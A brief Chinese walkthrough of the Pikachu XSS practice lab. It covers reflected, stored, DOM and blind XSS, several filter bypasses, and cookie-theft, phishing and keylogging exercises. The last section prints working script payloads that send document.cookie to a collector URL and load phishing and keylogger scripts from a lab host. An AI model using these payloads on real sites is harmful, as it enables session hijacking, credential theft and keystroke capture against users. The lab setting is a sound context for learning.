(一)反射型XSS

get型直接在url中输入payload即可

post型通过在表单中输入或者定位相应post变量直接传参payload即可

 (二)存储型XSS

 存储型XSS通过将payload提交到留言板中,之后每次访问该留言板都会触发它的script脚本

 (三)DOM型XSS

 通过观察发现可通过闭合HTML的方法来触发script脚本

(四)XSS盲打

输入后进入管理员后台查看

 进入后即可发现遭到xss攻击

(五)XSS过滤

这里使用大小写绕过xss过滤

也可通过图片标签绕过过滤

(六)xss之htmlspecialchars

通过引号闭合html

(七)xss之href输出

通过javascript协议执行alert

(八)js输出

 先使用</script>闭合它的script脚本,再写xss的script。

(九)cookie窃取

 更改pikachu平台的xsspt中cookie.php中的重定向内容为目标网站地址

 输入XSSpayload如下:

<script>document.location = 'http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

 

 cookie收集中可看到收集到的cookie

(十)钓鱼

 修改fish.php中的参数网址为目标网址

输入XSSpayload如下:

<script src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php"></script> 

 在钓鱼记录中找到记录

 

(十一)键盘监控


输入payload:

<script src="http://127.0.0.1/pikachu/pkxss/rkeypress/rk.js">

  

 

 

12-26 16:25
查看更多